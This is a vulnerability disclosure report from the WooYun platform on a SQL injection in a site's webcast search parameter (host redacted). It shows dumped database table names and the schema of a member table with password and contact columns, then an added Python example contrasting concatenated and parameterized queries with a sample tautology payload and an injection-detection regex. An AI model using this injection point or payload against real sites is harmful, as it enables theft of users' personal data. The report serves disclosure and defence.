
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0136361

Title: SQL injection on the main site of China Industrial Control Network (中华工控网), able to leak a large amount of member data

Vendor: Shenzhen Jikong Shidai Technology Co., Ltd. (深圳市技控时代科技有限公司)

Author: 路人甲

Submitted: 2015-08-26 15:42

Fixed: 2015-10-13 09:50

Published: 2015-10-13 09:50

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org. For questions or help, contact [email protected]

Tags: (none)



Vulnerability details

Disclosure status:

2015-08-26: Details sent to the vendor; awaiting vendor handling
2015-08-29: Vendor confirmed; details disclosed to the vendor only
2015-09-08: Details disclosed to core white hats and relevant domain experts
2015-09-18: Details disclosed to regular white hats
2015-09-28: Details disclosed to intern white hats
2015-10-13: Details disclosed to the public

Brief description:

See title.

Detailed description:

SQL injection via the search parameter (host redacted in the original):
**.**.**.**/webcast/SearchWebcast.aspx?key=admin

[Screenshots: 2.png, 1.png]


Database: gkong
[378 tables]
+----------------------------------------------------+
| AD_AddCustomerCle |
| Blog_Downloads |
| BusinessCard |
| BusinessLicense |
| ChapterDing |
| CheckRequest |
| Comm_Pingpai_main |
| DataConvert |
| DataConvert_Source |
| Dictionary_CompanyType |
| Dictionary_Occupation |
| Exp_Expert |
| Exp_ExpertType |
| FC_Factory |
| FC_LOG |
| FC_Trademarks |
| FC_User |
| GK_INDEX_INFO |
| GK_SMS |
| GK_SMSHistory |
| GK_TOP10 |
| Gk_Area_Panel |
| GuestBook |
| KeyWordsAd |
| LogoLinks |
| OLC_20 |
| OLC_50 |
| OLC_70 |
| P2PUserOnline |
| SYS_20 |
| SYS_30 |
| SYS_40 |
| SYS_50 |
| SYS_PYTable |
| Sheet1 |
| Sheng |
| SynchronizeTable |
| Temp_Download_A |
| Temp_Download_B |
| Temp_Download_C |
| Temp_Download_D |
| ThirdPartyUser |
| UserAttachment |
| UserScoreYears |
| VIEW_BBS_APPlOGO |
| VIEW_BB_BBS1 |
| VIEW_bb_Topic |
| V_title |
| V_vote |
| View_BookOrder |
| View_IsBlog |
| View_Person_Bbs1_Board |
| View_Person_BbsTopic_Board |
| View_Person_GK_Blog_BlogText |
| tmp-src |
| address_area |
| admin_log |
| admin_option_log |
| arc_dc |
| arc_scbg |
| bb_Address |
| bb_Admin |
| bb_BBS1 |
| bb_BBSLink |
| bb_BBSNews |
| bb_BestTopic |
| bb_Board |
| bb_BoardPermission |
| bb_Bookmark |
| bb_Class |
| bb_Config |
| bb_Friend |
| bb_GroupName |
| bb_LockIP |
| bb_Log |
| bb_Message |
| bb_Message_bak |
| bb_Notice_refuse |
| bb_Notices |
| bb_Online |
| bb_ScoreOperate |
| bb_SmallPaper |
| bb_Topic |
| bb_User |
| bb_UserAccess |
| bb_UserGroups |
| bb_UserScore20081030中午12点 |
| bb_UserScorePerDay |
| bb_UserTitle |
| bb_User_TransmitEmail |
| bb_Vote |
| bb_VoteUser |
| bb_board_trademark |
| bb_download_info |
| bb_medal |
| bb_notdownload |
| bb_topic_info |
| bb_user_mobile |
| bb_user_oauth |
| bb_vip |
| bbs_AppLogo |
| bbs_ExtrScoreLog |
| bbs_blackHouse |
| bbs_hotImages |
| bbs_talk |
| bbs_tuijian |
| blockWords |
| blog_admin |
| blog_blog |
| blog_bloginfo |
| blog_blogteam |
| blog_classname |
| blog_comment |
| blog_filtrate |
| blog_jubao |
| blog_lockip |
| blog_message |
| blog_notdownload |
| blog_skin |
| blog_subject |
| blog_sysskin |
| blog_tag |
| blog_trackback |
| blog_user |
| blog_userskin |
| blog_usertype |
| book_addressList |
| book_class |
| book_gift |
| book_order |
| book_product |
| book_publish |
| bu_message |
| bu_order_goods |
| bu_order_list |
| caa_huiyuandanwei |
| campus_articles |
| campus_login |
| client_Dictionary |
| client_DownloadTable |
| comm_add_dl_pp |
| comm_cs1_dl |
| comm_cs_dl |
| comm_cs_pp |
| comm_dalei |
| comm_pinpai |
| comm_temp_pinpaileibie |
| cp_invite |
| cp_look |
| downloadSort |
| downloads |
| downloads_information |
| dtproperties |
| gk_2394872sadjkflsh_Templates |
| gk_5stars_info |
| gk_Area |
| gk_BBSWeekly |
| gk_Cheap |
| gk_Class |
| gk_Dictionary_Score |
| gk_EmailList |
| gk_EmailSubscribe |
| gk_News_OriginalType |
| gk_OnLineQuestion |
| gk_Sort_Content |
| gk_Subarea |
| gk_SubareaDetail |
| gk_Templates_HTML_Detail |
| gk_Templates_HTML_List |
| gk_Templates_HTML_Url |
| gk_UserInformation |
| gk_UserScore |
| gk_UserScoreTrans |
| gk_UserScoreTrans_2008_2011 |
| gk_UserScoreTrans_today |
| gk_WebCast |
| gk_WebCastLive |
| gk_WebCastQuestion |
| gk_WebCastRegister |
| gk_WebCastSection |
| gk_WebCastTeacher |
| gk_ad |
| gk_ad_date |
| gk_ad_layer |
| gk_admin |
| gk_apply |
| gk_applykey |
| gk_area_improsort |
| gk_area_index |
| gk_bbszt |
| gk_bbsztlist |
| gk_blog_CSTouPiaoRZ |
| gk_blog_CSUser |
| gk_blog_zt |
| gk_blog_zt_sort |
| gk_book |
| gk_column |
| gk_copath |
| gk_diaocha_links |
| gk_edm_link |
| gk_elearn |
| gk_elearn_onlinequestion |
| gk_elearn_teacher |
| gk_exhibit |
| gk_exhibit_column |
| gk_exhibit_info |
| gk_exhibit_links |
| gk_exhibits_wszt |
| gk_exhibits_zt |
| gk_express_user |
| gk_favor |
| gk_feedback |
| gk_field |
| gk_focus |
| gk_focus_tj |
| gk_focus_type |
| gk_gg |
| gk_gkwGroup |
| gk_gkwGroupUsers |
| gk_hotQuestions |
| gk_hot_Keywords |
| gk_index_info_column |
| gk_infobbs |
| gk_intercourse_questionary |
| gk_jianlinpeixun |
| gk_jxsbzzs |
| gk_kandian |
| gk_keywords |
| gk_learn |
| gk_learn_1 |
| gk_lingyu_sort |
| gk_links |
| gk_loginLog |
| gk_lovewall |
| gk_msg_jubao |
| gk_mysearch |
| gk_news |
| gk_news1 |
| gk_news_20100104 |
| gk_news_Templet |
| gk_news_sort |
| gk_oos |
| gk_pinpaileibie |
| gk_pro_series |
| gk_products |
| gk_questionary |
| gk_search_column |
| gk_search_key |
| gk_search_keywords |
| gk_search_log |
| gk_shop |
| gk_solution |
| gk_solution_20100104 |
| gk_sort |
| gk_tuijianchanpin |
| gk_tuijianproducts |
| gk_tuwenbankuai |
| gk_userGroup |
| gk_webCastOnline |
| gk_weblink |
| gk_weekly |
| gk_wenzhai |
| gk_zhuanfang |
| gk_zhuanti |
| gk_zl_ass |
| gk_zt_lanmu |
| gk_ztsort |
| join_corporation |
| leavemess |
| login_log |
| mails_all |
| mails_auto |
| mails_gongkong |
| mails_tlm |
| mn_admin |
| mn_article |
| mn_books |
| mn_critique |
| mn_download |
| mn_infobbs |
| mn_kanhao |
| mn_log_data |
| mn_mans |
| mn_peixun |
| mn_people |
| mn_sec_sort |
| mn_sort |
| mn_sy_wenzhang |
| mn_user |
| op_user |
| rj_education |
| rj_experience |
| rj_infor |
| rj_look |
| rj_peixun |
| school_log |
| school_online |
| search_counter |
| sysconstraints |
| syssegments |
| try_product_intro |
| try_products |
| try_user |
| ty_GuestSay |
| v_user |
| view_BBS_Boards |
| view_BBS_ClassBoard |
| view_Download_List |
| view_INDEX_ALLbbUserScore |
| view_INDEX_Application_Learn |
| view_INDEX_Application_Solution |
| view_INDEX_BBS |
| view_INDEX_BBS_pass |
| view_INDEX_BBS_pass_unpass |
| view_INDEX_Blog |
| view_INDEX_Blog_pass |
| view_INDEX_Blog_pass_unpass |
| view_INDEX_Business_BBS |
| view_INDEX_Business_Buy |
| view_INDEX_Business_Supply |
| view_INDEX_Download |
| view_INDEX_Download_pass |
| view_INDEX_Download_pass_unpass |
| view_INDEX_Downloads |
| view_INDEX_Enterprise |
| view_INDEX_Enterprise_pass |
| view_INDEX_Enterprise_pass_unpass |
| view_INDEX_Invite |
| view_INDEX_News |
| view_INDEX_News_pass |
| view_INDEX_News_pass_unpass |
| view_INDEX_Product |
| view_INDEX_Product_keywords |
| view_INDEX_Product_keywords_right |
| view_INDEX_Product_pass |
| view_INDEX_Product_pass_unpass |
| view_INDEX_SearchKey |
| view_INDEX_Solution |
| view_INDEX_Solution_pass |
| view_INDEX_Solution_pass_unpass |
| view_INDEX_keywords |
| view_MailList_ExpressUser |
| view_MailList_Infor |
| view_MailList_IntercourseQuestionary |
| view_MailList_Questionary |
| view_MailList_bbUser |
| view_SynchronizationBBSTopic |
| view_Templates_Inc_NameCards |
| view_Templates_Inc_NameCards_0 |
| view_Templates_Inc_NameCards_1 |
| view_Templates_Inc_buy_RIGHT |
| view_Templates_Inc_buy_USER |
| view_Templates_Inc_products_RIGHT |
| view_Templates_Inc_products_USER |
| view_Templates_KeyWordsAd_LIST |
| view_Templates_KeyWordsAd_LIST_DETAIL |
| view_Templates_News_Inc_Right_PreviousYears |
| view_Templates_News_Inc_Right_PreviousYears_Detail |
| view_Templates_News_Inc_Right_ThisYear |
| view_Templates_News_Inc_Right_ThisYear_Detail |
| view_Templates_News_YYYYMM_LIST |
| view_Templates_News_YYYYMM_LIST_DETAIL |
| view_Templates_News_YYYY_LIST |
| view_Templates_News_YYYY_LIST_DETAIL |
| view_Templates_infobbs_buy |
| view_Templates_news |
| view_Templates_products |
| view_Templates_user |
| view_ThirdPartyUser |
| view_bb_topic_info |
| view_bb_user_cn |
| view_solution_index |
| view_solution_index_PageOne |
| web_ad |
| weixin_news |
| 经过北京邮件系统Mailbus发送失败的 |
| 论坛发贴邮箱 |
| gk_jishubu.gk_BBWeekly |
+----------------------------------------------------+

[Screenshot: 3.png]


Database: gkong
Table: bb_User
[101 columns]
+------------------+---------------+
| Column | Type |
+------------------+---------------+
| addDate | smalldatetime |
| answer | varchar |
| Article | int |
| bbstype | int |
| birthday | varchar |
| ChangeDate | datetime |
| face | varchar |
| height | int |
| homepage | varchar |
| ICQ | varchar |
| Is_ChangeInfo | int |
| l_addr | varchar |
| l_addr_guojia | varchar |
| l_addr_sheng | varchar |
| l_addr_shi | varchar |
| l_addr_xian | varchar |
| l_city | varchar |
| l_college | varchar |
| l_country | varchar |
| l_crm_ExpireTime | datetime |
| l_education | varchar |
| l_face | int |
| l_fax | varchar |
| l_fullname | varchar |
| l_gongkai | int |
| l_grade | int |
| l_hangye | varchar |
| l_info_vip | varchar |
| l_interested | varchar |
| l_intro | text |
| l_jxsbzzs | varchar |
| l_linkman | varchar |
| l_meiti | varchar |
| l_MgUpdateDate | smalldatetime |
| l_mobile | varchar |
| l_occupation | varchar |
| l_paiming | varchar |
| l_parent_company | int |
| l_parent_status | int |
| l_pass | int |
| l_pass_addr | int |
| l_pass_admin | varchar |
| l_pass_company | int |
| l_pass_date | datetime |
| l_pass_email | int |
| l_pass_name | int |
| l_pass_tel | int |
| l_pc | varchar |
| l_products | varchar |
| l_products_count | int |
| l_province | varchar |
| l_quhao | varchar |
| l_sheng | int |
| l_star | int |
| l_tel | varchar |
| l_type | int |
| l_updateDate | smalldatetime |
| l_vip | int |
| l_xingzhi | varchar |
| lastlogin | smalldatetime |
| lockuser | int |
| logins | int |
| mail_verified | bit |
| mobile_verified | bit |
| MSN | varchar |
| Oicq | varchar |
| quesion | varchar |
| reann | varchar |
| Sex | varchar |
| showre | bit |
| sign | ntext |
| title | varchar |
| TitlePic | varchar |
| userclass | varchar |
| usercookies | int |
| userCP | int |
| UserDel | int |
| UserEmail | varchar |
| userEP | int |
| UserGroup | varchar |
| UserGroupID | int |
| UserID | int |
| UserInfo | text |
| UserIsBest | int |
| UserLastIP | varchar |
| UserName | varchar |
| userpassword | varchar |
| UserPhoto | varchar |
| UserPower | int |
| UserSetting | varchar |
| userWealth | int |
| userWealth_2009 | int |
| userWealth_2010 | int |
| userWealth_2011 | int |
| userWealth_2012 | int |
| userWealth_2013 | int |
| userWealth_all | int |
| userWealth_bak | int |
| vip_status | int |
| vip_time | datetime |
| width | int |
+------------------+---------------+

[Screenshot: 4.png]


Proof of vulnerability:

[Screenshot: x1.png]

Fix recommendation:
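The report leaves the fix section empty. The following Python is an added example, not the site's code or the reporter's: it models the flaw class behind a search parameter such as SearchWebcast.aspx?key= by placing a query built with string concatenation beside its parameterized form, and adds a coarse access-log check a defender could run to spot probing of such an endpoint. SQLite stands in for the site's SQL Server backend, and the table, its columns, the function names and the log lines are all constructed assumptions.

```python
"""Search-parameter SQL injection: the vulnerable query shape beside its
parameterized fix, plus a coarse access-log check.

Example code added to this page; it is not the site's code. SQLite stands
in for the site's SQL Server backend, and every table, column, function
name and log line below is constructed for the demonstration."""
import re
import sqlite3
from urllib.parse import unquote

# Constructed rows for a toy webcast table (the real site lists a gk_WebCast
# table, but its columns are not on the page, so these are assumptions).
SAMPLE_WEBCASTS = [
    (1, "PLC programming basics", 1),
    (2, "Internal admin panel walkthrough", 0),  # unpublished: must never be listed
    (3, "Industrial Ethernet security", 1),
]

# Constructed access-log lines in a simplified "timestamp method path query status" form.
SAMPLE_LOG = [
    "2015-08-26 15:40:01 GET /webcast/SearchWebcast.aspx key=admin 200",
    "2015-08-26 15:40:07 GET /webcast/SearchWebcast.aspx key=%25%27%20OR%20%271%27%3D%271%27%20-- 200",
    "2015-08-26 15:40:12 GET /webcast/SearchWebcast.aspx key=ethernet 200",
]


def make_db():
    """Build an in-memory SQLite database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE webcast (id INTEGER, title TEXT, published INTEGER)")
    conn.executemany("INSERT INTO webcast VALUES (?, ?, ?)", SAMPLE_WEBCASTS)
    return conn


def search_vulnerable(conn, key):
    """The flaw class in the report: user input spliced into the SQL text.

    A key such as  %' OR '1'='1' --  turns the WHERE clause into a tautology
    and comments out the rest, so the published filter no longer applies."""
    sql = ("SELECT id FROM webcast WHERE published = 1 "
           "AND title LIKE '%" + key + "%' ORDER BY id")
    return sorted(row[0] for row in conn.execute(sql))


def search_safe(conn, key):
    """Parameterized form: the driver passes key as a value, never as syntax,
    so the same payload is only ever a (non-matching) LIKE pattern."""
    sql = ("SELECT id FROM webcast WHERE published = 1 "
           "AND title LIKE '%' || ? || '%' ORDER BY id")
    return sorted(row[0] for row in conn.execute(sql, (key,)))


# Coarse heuristic: a quote character followed by a SQL connective or comment
# marker inside the key parameter. Parameterized queries are the real fix;
# this only helps spot probing of the endpoint in logs after the fact.
SUSPICIOUS = re.compile(r"'\s*(or|and|union|select|--|;)", re.IGNORECASE)
KEY_PARAM = re.compile(r"(?:\?|&|\s)key=([^&\s]*)")


def flag_requests(log_lines):
    """Return the log lines whose URL-decoded key= value looks like SQL injection."""
    flagged = []
    for line in log_lines:
        m = KEY_PARAM.search(line)
        if m and SUSPICIOUS.search(unquote(m.group(1))):
            flagged.append(line)
    return flagged


if __name__ == "__main__":
    db = make_db()
    payload = "%' OR '1'='1' --"
    print("normal key, vulnerable:", search_vulnerable(db, "Ethernet"))  # [3]
    print("payload, vulnerable:", search_vulnerable(db, payload))        # [1, 2, 3]
    print("payload, parameterized:", search_safe(db, payload))           # []
    for line in flag_requests(SAMPLE_LOG):
        print("flagged:", line)
```

The two search functions differ only in how the key reaches the database: the parameterized version hands it to the driver as a bound value, so no input can change the statement's structure, which is the fix the report's finding calls for. The log check is a heuristic for triage, not a substitute for that fix.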

Copyright notice: when reposting, please credit the source: 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 7

Confirmation time: 2015-08-29 09:48

Vendor reply:

CNVD confirmed and reproduced the described situation, and notified the vendor by e-mail through the website's public contact channel.

Latest status:

None yet